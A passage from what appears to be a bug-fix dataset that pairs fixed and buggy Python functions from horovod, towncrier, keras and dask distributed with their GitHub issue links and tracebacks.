optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.numpy()[0], dtypes
)
return _from_tensor
|
def _create_option_callback(index, option_key, option_tensor, dtype):
def _from_tensor():
optimizer.param_groups[index][option_key] = dtype(option_tensor.numpy()[0])
return _from_tensor
|
https://github.com/horovod/horovod/issues/605
|
Traceback (most recent call last):
File "train.py", line 641, in <module>
train_images(hps)
File "train.py", line 444, in train_images
train_step(batch, batch_idx, epoch, hps, model, opt, train_logger)
File "train.py", line 457, in train_step
opt.step()
File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 97, in step
return super(self.__class__, self).step(closure)
File "/opt/conda/lib/python3.6/site-packages/torch/optim/adamax.py", line 75, in step
exp_avg.mul_(beta1).add_(1 - beta1, grad)
TypeError: mul_() received an invalid combination of arguments - got (numpy.float32), but expected one of:
* (Tensor other)
didn't match because some of the arguments have invalid types: (numpy.float32)
* (float other)
didn't match because some of the arguments have invalid types: (numpy.float32)
|
TypeError
|
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.numpy()[0], dtypes
)
|
def _from_tensor():
optimizer.param_groups[index][option_key] = dtype(option_tensor.numpy()[0])
|
https://github.com/horovod/horovod/issues/605
|
Traceback (most recent call last):
File "train.py", line 641, in <module>
train_images(hps)
File "train.py", line 444, in train_images
train_step(batch, batch_idx, epoch, hps, model, opt, train_logger)
File "train.py", line 457, in train_step
opt.step()
File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 97, in step
return super(self.__class__, self).step(closure)
File "/opt/conda/lib/python3.6/site-packages/torch/optim/adamax.py", line 75, in step
exp_avg.mul_(beta1).add_(1 - beta1, grad)
TypeError: mul_() received an invalid combination of arguments - got (numpy.float32), but expected one of:
* (Tensor other)
didn't match because some of the arguments have invalid types: (numpy.float32)
* (float other)
didn't match because some of the arguments have invalid types: (numpy.float32)
|
TypeError
|
def find_fragments(base_directory, sections, fragment_directory, definitions):
"""
Sections are a dictonary of section names to paths.
"""
content = OrderedDict()
fragment_filenames = []
for key, val in sections.items():
if fragment_directory is not None:
section_dir = os.path.join(base_directory, val, fragment_directory)
else:
section_dir = os.path.join(base_directory, val)
if sys.version_info >= (3,):
expected_exception = FileNotFoundError
else:
expected_exception = OSError
try:
files = os.listdir(section_dir)
except expected_exception as e:
message = "Failed to list the news fragment files.\n{}".format(
"".join(traceback.format_exception_only(type(e), e)),
)
raise ConfigError(message)
file_content = {}
for basename in files:
ticket, category, counter = parse_newfragment_basename(
basename, definitions
)
if category is None:
continue
full_filename = os.path.join(section_dir, basename)
fragment_filenames.append(full_filename)
with open(full_filename, "rb") as f:
data = f.read().decode("utf8", "replace")
if (ticket, category, counter) in file_content:
raise ValueError(
"multiple files for {}.{} in {}".format(
ticket, category, section_dir
)
)
file_content[ticket, category, counter] = data
content[key] = file_content
return content, fragment_filenames
|
def find_fragments(base_directory, sections, fragment_directory, definitions):
"""
Sections are a dictonary of section names to paths.
"""
content = OrderedDict()
fragment_filenames = []
for key, val in sections.items():
if fragment_directory is not None:
section_dir = os.path.join(base_directory, val, fragment_directory)
else:
section_dir = os.path.join(base_directory, val)
files = os.listdir(section_dir)
file_content = {}
for basename in files:
ticket, category, counter = parse_newfragment_basename(
basename, definitions
)
if category is None:
continue
full_filename = os.path.join(section_dir, basename)
fragment_filenames.append(full_filename)
with open(full_filename, "rb") as f:
data = f.read().decode("utf8", "replace")
if (ticket, category, counter) in file_content:
raise ValueError(
"multiple files for {}.{} in {}".format(
ticket, category, section_dir
)
)
file_content[ticket, category, counter] = data
content[key] = file_content
return content, fragment_filenames
|
https://github.com/twisted/towncrier/issues/85
|
Loading template...
Finding news fragments...
Traceback (most recent call last):
…
File "/tmp/myvenv/lib/python2.7/site-packages/towncrier/_builder.py", line 46, in find_fragments
files = os.listdir(section_dir)
OSError: [Errno 2] No such file or directory: '…/PyInstaller/newsfragments'
|
OSError
|
def __main(comparewith, directory, config):
base_directory, config = load_config_from_options(directory, config)
# Use UTF-8 both when sys.stdout does not have .encoding (Python 2.7) and
# when the attribute is present but set to None (explicitly piped output
# and also some CI such as GitHub Actions).
encoding = getattr(sys.stdout, "encoding", None)
if encoding is None:
encoding = "utf8"
try:
files_changed = (
_run(
["git", "diff", "--name-only", comparewith + "..."], cwd=base_directory
)
.decode(encoding)
.strip()
)
except CalledProcessError as e:
click.echo("git produced output while failing:")
click.echo(e.output)
raise
if not files_changed:
click.echo("On trunk, or no diffs, so no newsfragment required.")
sys.exit(0)
files = {
os.path.normpath(os.path.join(base_directory, path))
for path in files_changed.strip().splitlines()
}
click.echo("Looking at these files:")
click.echo("----")
for n, change in enumerate(files, start=1):
click.echo("{}. {}".format(n, change))
click.echo("----")
fragments = set()
if config.get("directory"):
fragment_base_directory = os.path.abspath(config["directory"])
fragment_directory = None
else:
fragment_base_directory = os.path.abspath(
os.path.join(base_directory, config["package_dir"], config["package"])
)
fragment_directory = "newsfragments"
fragments = {
os.path.normpath(path)
for path in find_fragments(
fragment_base_directory,
config["sections"],
fragment_directory,
config["types"],
)[1]
}
fragments_in_branch = fragments & files
if not fragments_in_branch:
click.echo("No new newsfragments found on this branch.")
sys.exit(1)
else:
click.echo("Found:")
for n, fragment in enumerate(fragments_in_branch, start=1):
click.echo("{}. {}".format(n, fragment))
sys.exit(0)
|
def __main(comparewith, directory, config):
base_directory, config = load_config_from_options(directory, config)
try:
files_changed = (
_run(
["git", "diff", "--name-only", comparewith + "..."], cwd=base_directory
)
.decode(getattr(sys.stdout, "encoding", "utf8"))
.strip()
)
except CalledProcessError as e:
click.echo("git produced output while failing:")
click.echo(e.output)
raise
if not files_changed:
click.echo("On trunk, or no diffs, so no newsfragment required.")
sys.exit(0)
files = {
os.path.normpath(os.path.join(base_directory, path))
for path in files_changed.strip().splitlines()
}
click.echo("Looking at these files:")
click.echo("----")
for n, change in enumerate(files, start=1):
click.echo("{}. {}".format(n, change))
click.echo("----")
fragments = set()
if config.get("directory"):
fragment_base_directory = os.path.abspath(config["directory"])
fragment_directory = None
else:
fragment_base_directory = os.path.abspath(
os.path.join(base_directory, config["package_dir"], config["package"])
)
fragment_directory = "newsfragments"
fragments = {
os.path.normpath(path)
for path in find_fragments(
fragment_base_directory,
config["sections"],
fragment_directory,
config["types"],
)[1]
}
fragments_in_branch = fragments & files
if not fragments_in_branch:
click.echo("No new newsfragments found on this branch.")
sys.exit(1)
else:
click.echo("Found:")
for n, fragment in enumerate(fragments_in_branch, start=1):
click.echo("{}. {}".format(n, fragment))
sys.exit(0)
|
https://github.com/twisted/towncrier/issues/175
|
Traceback (most recent call last):
File "/opt/hostedtoolcache/Python/2.7.17/x64/lib/python2.7/runpy.py", line 174, in _run_module_as_main
"__main__", fname, loader, pkg_name)
File "/opt/hostedtoolcache/Python/2.7.17/x64/lib/python2.7/runpy.py", line 72, in _run_code
exec code in run_globals
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/towncrier/check.py", line 98, in <module>
_main()
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/click/core.py", line 764, in __call__
return self.main(*args, **kwargs)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/click/core.py", line 717, in main
rv = self.invoke(ctx)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/click/core.py", line 956, in invoke
return ctx.invoke(self.callback, **ctx.params)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/click/core.py", line 555, in invoke
return callback(*args, **kwargs)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/towncrier/check.py", line 31, in _main
return __main(compare_with, directory, pyproject)
File "/home/runner/work/tahoe-lafs/tahoe-lafs/.tox/codechecks/lib/python2.7/site-packages/towncrier/check.py", line 44, in __main
.decode(getattr(sys.stdout, "encoding", "utf8"))
TypeError: decode() argument 1 must be string, not None
|
TypeError
|
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = lambda seqs: multiprocessing.Pool(
workers, initializer=init_pool, initargs=(seqs,)
)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
|
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = lambda: multiprocessing.Pool(workers)
else:
self.executor_fn = lambda: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
|
https://github.com/keras-team/keras/issues/9434
|
Traceback (most recent call last):
File "C:\Users\elcombato\AppData\Local\Continuum\Anaconda3\envs\ml\lib\multiprocessing\pool.py", line 119, in worker
result = (True, func(*args, **kwds))
File "C:\Users\elcombato\AppData\Local\Continuum\Anaconda3\envs\ml\lib\site-packages\keras\utils\data_utils.py", line 392, in get_index
return _SHARED_SEQUENCES[uid][i]
KeyError: 0
|
KeyError
|
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True
)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
|
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn()) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True
)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
|
https://github.com/keras-team/keras/issues/9434
|
Traceback (most recent call last):
File "C:\Users\elcombato\AppData\Local\Continuum\Anaconda3\envs\ml\lib\multiprocessing\pool.py", line 119, in worker
result = (True, func(*args, **kwds))
File "C:\Users\elcombato\AppData\Local\Continuum\Anaconda3\envs\ml\lib\site-packages\keras\utils\data_utils.py", line 392, in get_index
return _SHARED_SEQUENCES[uid][i]
KeyError: 0
|
KeyError
|
def __init__(
self,
address=None,
loop=None,
timeout=no_default,
set_as_default=True,
scheduler_file=None,
security=None,
asynchronous=False,
name=None,
heartbeat_interval=None,
serializers=None,
deserializers=None,
extensions=DEFAULT_EXTENSIONS,
direct_to_workers=None,
connection_limit=512,
**kwargs,
):
if timeout == no_default:
timeout = dask.config.get("distributed.comm.timeouts.connect")
if timeout is not None:
timeout = parse_timedelta(timeout, "s")
self._timeout = timeout
self.futures = dict()
self.refcount = defaultdict(lambda: 0)
self.coroutines = []
if name is None:
name = dask.config.get("client-name", None)
self.id = (
type(self).__name__
+ ("-" + name + "-" if name else "-")
+ str(uuid.uuid1(clock_seq=os.getpid()))
)
self.generation = 0
self.status = "newly-created"
self._pending_msg_buffer = []
self.extensions = {}
self.scheduler_file = scheduler_file
self._startup_kwargs = kwargs
self.cluster = None
self.scheduler = None
self._scheduler_identity = {}
# A reentrant-lock on the refcounts for futures associated with this
# client. Should be held by individual operations modifying refcounts,
# or any bulk operation that needs to ensure the set of futures doesn't
# change during operation.
self._refcount_lock = threading.RLock()
self.datasets = Datasets(self)
self._serializers = serializers
if deserializers is None:
deserializers = serializers
self._deserializers = deserializers
self.direct_to_workers = direct_to_workers
# Communication
self.scheduler_comm = None
if address is None:
address = dask.config.get("scheduler-address", None)
if address:
logger.info("Config value `scheduler-address` found: %s", address)
if address is not None and kwargs:
raise ValueError("Unexpected keyword arguments: {}".format(str(sorted(kwargs))))
if isinstance(address, (rpc, PooledRPCCall)):
self.scheduler = address
elif isinstance(getattr(address, "scheduler_address", None), str):
# It's a LocalCluster or LocalCluster-compatible object
self.cluster = address
with suppress(AttributeError):
loop = address.loop
if security is None:
security = getattr(self.cluster, "security", None)
elif address is not None and not isinstance(address, str):
raise TypeError(
"Scheduler address must be a string or a Cluster instance, got {}".format(
type(address)
)
)
if security is None:
security = Security()
elif security is True:
security = Security.temporary()
self._startup_kwargs["security"] = security
elif not isinstance(security, Security):
raise TypeError("security must be a Security object")
self.security = security
if name == "worker":
self.connection_args = self.security.get_connection_args("worker")
else:
self.connection_args = self.security.get_connection_args("client")
self._connecting_to_scheduler = False
self._asynchronous = asynchronous
self._should_close_loop = not loop
self._loop_runner = LoopRunner(loop=loop, asynchronous=asynchronous)
self.io_loop = self.loop = self._loop_runner.loop
self._gather_keys = None
self._gather_future = None
if heartbeat_interval is None:
heartbeat_interval = dask.config.get("distributed.client.heartbeat")
heartbeat_interval = parse_timedelta(heartbeat_interval, default="ms")
scheduler_info_interval = parse_timedelta(
dask.config.get("distributed.client.scheduler-info-interval", default="ms")
)
self._periodic_callbacks = dict()
self._periodic_callbacks["scheduler-info"] = PeriodicCallback(
self._update_scheduler_info,
scheduler_info_interval * 1000,
)
self._periodic_callbacks["heartbeat"] = PeriodicCallback(
self._heartbeat, heartbeat_interval * 1000
)
self._start_arg = address
if set_as_default:
self._set_config = dask.config.set(
scheduler="dask.distributed", shuffle="tasks"
)
self._stream_handlers = {
"key-in-memory": self._handle_key_in_memory,
"lost-data": self._handle_lost_data,
"cancelled-key": self._handle_cancelled_key,
"task-retried": self._handle_retried_key,
"task-erred": self._handle_task_erred,
"restart": self._handle_restart,
"error": self._handle_error,
}
self._state_handlers = {
"memory": self._handle_key_in_memory,
"lost": self._handle_lost_data,
"erred": self._handle_task_erred,
}
self.rpc = ConnectionPool(
limit=connection_limit,
serializers=serializers,
deserializers=deserializers,
deserialize=True,
connection_args=self.connection_args,
timeout=timeout,
server=self,
)
for ext in extensions:
ext(self)
self.start(timeout=timeout)
Client._instances.add(self)
from distributed.recreate_exceptions import ReplayExceptionClient
ReplayExceptionClient(self)
|
def __init__(
self,
address=None,
loop=None,
timeout=no_default,
set_as_default=True,
scheduler_file=None,
security=None,
asynchronous=False,
name=None,
heartbeat_interval=None,
serializers=None,
deserializers=None,
extensions=DEFAULT_EXTENSIONS,
direct_to_workers=None,
connection_limit=512,
**kwargs,
):
if timeout == no_default:
timeout = dask.config.get("distributed.comm.timeouts.connect")
if timeout is not None:
timeout = parse_timedelta(timeout, "s")
self._timeout = timeout
self.futures = dict()
self.refcount = defaultdict(lambda: 0)
self.coroutines = []
if name is None:
name = dask.config.get("client-name", None)
self.id = (
type(self).__name__
+ ("-" + name + "-" if name else "-")
+ str(uuid.uuid1(clock_seq=os.getpid()))
)
self.generation = 0
self.status = "newly-created"
self._pending_msg_buffer = []
self.extensions = {}
self.scheduler_file = scheduler_file
self._startup_kwargs = kwargs
self.cluster = None
self.scheduler = None
self._scheduler_identity = {}
# A reentrant-lock on the refcounts for futures associated with this
# client. Should be held by individual operations modifying refcounts,
# or any bulk operation that needs to ensure the set of futures doesn't
# change during operation.
self._refcount_lock = threading.RLock()
self.datasets = Datasets(self)
self._serializers = serializers
if deserializers is None:
deserializers = serializers
self._deserializers = deserializers
self.direct_to_workers = direct_to_workers
# Communication
self.scheduler_comm = None
if address is None:
address = dask.config.get("scheduler-address", None)
if address:
logger.info("Config value `scheduler-address` found: %s", address)
if address is not None and kwargs:
raise ValueError("Unexpected keyword arguments: {}".format(str(sorted(kwargs))))
if isinstance(address, (rpc, PooledRPCCall)):
self.scheduler = address
elif hasattr(address, "scheduler_address"):
# It's a LocalCluster or LocalCluster-compatible object
self.cluster = address
with suppress(AttributeError):
loop = address.loop
if security is None:
security = getattr(self.cluster, "security", None)
if security is None:
security = Security()
elif security is True:
security = Security.temporary()
self._startup_kwargs["security"] = security
elif not isinstance(security, Security):
raise TypeError("security must be a Security object")
self.security = security
if name == "worker":
self.connection_args = self.security.get_connection_args("worker")
else:
self.connection_args = self.security.get_connection_args("client")
self._connecting_to_scheduler = False
self._asynchronous = asynchronous
self._should_close_loop = not loop
self._loop_runner = LoopRunner(loop=loop, asynchronous=asynchronous)
self.io_loop = self.loop = self._loop_runner.loop
self._gather_keys = None
self._gather_future = None
if heartbeat_interval is None:
heartbeat_interval = dask.config.get("distributed.client.heartbeat")
heartbeat_interval = parse_timedelta(heartbeat_interval, default="ms")
scheduler_info_interval = parse_timedelta(
dask.config.get("distributed.client.scheduler-info-interval", default="ms")
)
self._periodic_callbacks = dict()
self._periodic_callbacks["scheduler-info"] = PeriodicCallback(
self._update_scheduler_info,
scheduler_info_interval * 1000,
)
self._periodic_callbacks["heartbeat"] = PeriodicCallback(
self._heartbeat, heartbeat_interval * 1000
)
self._start_arg = address
if set_as_default:
self._set_config = dask.config.set(
scheduler="dask.distributed", shuffle="tasks"
)
self._stream_handlers = {
"key-in-memory": self._handle_key_in_memory,
"lost-data": self._handle_lost_data,
"cancelled-key": self._handle_cancelled_key,
"task-retried": self._handle_retried_key,
"task-erred": self._handle_task_erred,
"restart": self._handle_restart,
"error": self._handle_error,
}
self._state_handlers = {
"memory": self._handle_key_in_memory,
"lost": self._handle_lost_data,
"erred": self._handle_task_erred,
}
self.rpc = ConnectionPool(
limit=connection_limit,
serializers=serializers,
deserializers=deserializers,
deserialize=True,
connection_args=self.connection_args,
timeout=timeout,
server=self,
)
for ext in extensions:
ext(self)
self.start(timeout=timeout)
Client._instances.add(self)
from distributed.recreate_exceptions import ReplayExceptionClient
ReplayExceptionClient(self)
|
https://github.com/dask/distributed/issues/3839
|
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-3-82a29784114b> in <module>
1 cluster = LocalCluster
----> 2 client = Client(cluster)
~/Projects/dask/distributed/distributed/client.py in __init__(self, address, loop, timeout, set_as_default, scheduler_file, security, asynchronous, name, heartbeat_interval, serializers, deserializers, extensions, direct_to_workers, connection_limit, **kwargs)
734 ext(self)
735
--> 736 self.start(timeout=timeout)
737 Client._instances.add(self)
738
~/Projects/dask/distributed/distributed/client.py in start(self, **kwargs)
938 self._started = asyncio.ensure_future(self._start(**kwargs))
939 else:
--> 940 sync(self.loop, self._start, **kwargs)
941
942 def __await__(self):
~/Projects/dask/distributed/distributed/utils.py in sync(loop, func, callback_timeout, *args, **kwargs)
337 if error[0]:
338 typ, exc, tb = error[0]
--> 339 raise exc.with_traceback(tb)
340 else:
341 return result[0]
~/Projects/dask/distributed/distributed/utils.py in f()
321 if callback_timeout is not None:
322 future = asyncio.wait_for(future, callback_timeout)
--> 323 result[0] = yield future
324 except Exception as exc:
325 error[0] = sys.exc_info()
~/miniconda3/envs/dask/lib/python3.7/site-packages/tornado/gen.py in run(self)
733
734 try:
--> 735 value = future.result()
736 except Exception:
737 exc_info = sys.exc_info()
~/Projects/dask/distributed/distributed/client.py in _start(self, timeout, **kwargs)
1031
1032 if self.scheduler is None:
-> 1033 self.scheduler = self.rpc(address)
1034 self.scheduler_comm = None
1035
~/Projects/dask/distributed/distributed/core.py in __call__(self, addr, ip, port)
915 def __call__(self, addr=None, ip=None, port=None):
916 """ Cached rpc objects """
--> 917 addr = addr_from_args(addr=addr, ip=ip, port=port)
918 return PooledRPCCall(
919 addr, self, serializers=self.serializers, deserializers=self.deserializers
~/Projects/dask/distributed/distributed/core.py in addr_from_args(addr, ip, port)
616 if isinstance(addr, tuple):
617 addr = unparse_host_port(*addr)
--> 618 return normalize_address(addr)
619
620
~/Projects/dask/distributed/distributed/comm/addressing.py in normalize_address(addr)
52 'tcp://[::1]'
53 """
---> 54 return unparse_address(*parse_address(addr))
55
56
~/Projects/dask/distributed/distributed/comm/addressing.py in parse_address(addr, strict)
19 """
20 if not isinstance(addr, str):
---> 21 raise TypeError("expected str, got %r" % addr.__class__.__name__)
22 scheme, sep, loc = addr.rpartition("://")
23 if strict and not sep:
TypeError: expected str, got 'property'
|
TypeError
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.